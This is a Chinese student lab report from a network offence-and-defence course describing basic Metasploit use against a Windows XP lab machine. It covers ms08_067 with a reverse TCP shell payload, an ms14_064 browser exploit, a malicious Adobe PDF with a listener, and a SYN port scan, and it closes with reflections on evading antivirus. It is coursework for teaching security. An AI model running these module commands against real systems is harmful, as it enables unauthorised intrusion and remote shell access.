• 2019-2020-2 《网络对抗技术》Exp6 MSF基础应用


    2019-2020-2《网络对抗技术》Exp6 MSF基础应用

    一、实践目标

    掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。

    二、实践内容

    1. 一个主动攻击实践,如ms08_067;
    2. 一个针对浏览器的攻击,如ms11_050;
    3. 一个针对客户端的攻击,如Adobe;
    4. 成功应用任何一个辅助模块。

    三、实验步骤

    1.主动攻击实践,ms08_067

    靶机:windows XP 192.168.1.10
    尝试使用nmap扫描漏洞,发现有该漏洞
    msf的exploit进行漏洞攻击,show options之后发现默认端口是445

    用msf的Auxiliary辅助模块扫描靶机的445端口是否开启

    在攻击机kali的控制台中,依次输入以下指令:
    使用ms08_067模块: msf > use exploit/windows/smb/ms08_067_netapi
    设置payload:payload generic/shell_reverse_tcp
    设置ip地址 set lhost +攻击机ip地址 、set rhost +靶机ip地址
    输入exploit进行攻击,成功在kali中获得XP的shell:

    2.攻击浏览器的实践,ms14_064_ole_code_execution

    • 进入/usr/share/metasploit-framework/modules/exploits/windows/browser查看可以利用的漏洞
    • 查看ms14_064_ole_code_execution的description,发现可用于XP
    • 设置的参数如下:

    • 产生的URI在靶机中打开,在kali中再用sessions -i 1获得连接,可以获得shell:

    3.攻击客户端的实践,Adobe Reader

    使用模块exploit/windows/fileformat/adobe_cooltype_sing,设置参数如下:

    • 在kali中重新使用mult/handler模块进行监听,在靶机打开生成的pdf文件,回连成功:

    4.应用辅助模块

    • 进入msfconsole后,输入show auxiliary
    • use auxiliary/scanner/portscan/syn
    • 设置好相应参数,可以通过show options来查看
    • set RHOSTS 192.168.1.20 //设置扫描目标IP地址
    • set THREADS 50 //设置线程数
    • 启动:run

    四、实验总结与体会

    1.基础问题回答

    用自己的话解释什么是exploit,payload,encode.

    • Exploit:渗透攻击,攻击方利用系统或软件漏洞来进行攻击
    • payload:载荷,实验中指一段指令或shellcode,该代码具有反弹连接、创建用户、执行其他系统命令的功能
    • encode:编码器,用于清除坏字符、改变特征码,使得攻击能够顺利进行

    2.实践总结与体会

    对于攻击者来说,逐渐提升自身的能力,拥有一双发现漏洞的眼睛特别重要,而且得要有耐心,多次尝试,不断试错,才有可能进行一次成功的攻击;作为用户,拥有一定的安全意识尤为重要,平时一些小的地方注意了,产生警惕心理,就有可能让攻击者少一种攻击你的方式。只有自己心中有安全,才有可能安全。

    3.离实战还缺些什么技术或步骤?

    • 信息收集尤为重要,需要获取最新漏洞情报。
    • 要提升自己的各方面能力,比如说编写实现特定功能的payload,这样的攻击会更有针对性。
    • 如何把后门程序送入靶机也是一大难点。
    • 如何绕开防火墙和杀毒软件的免杀也是重点。
  • 相关阅读:
    找到数组中消失的所有数字-算法刷题总结
    爬楼梯-算法练习笔记
    最长公共前缀-刷题总结
    每日温度-算法详细分析
    买卖股票的最佳时机-算法详细分析
    回文数-算法详细分析
    合并两个有序链表-算法详细法分析
    最短无序连续子数组 | 算法详细分析
    整数反转-算法详细分析
    python设计模式之责任链模式
  • 原文地址:https://www.cnblogs.com/Brass/p/12820557.html
Copyright © 2020-2023  润新知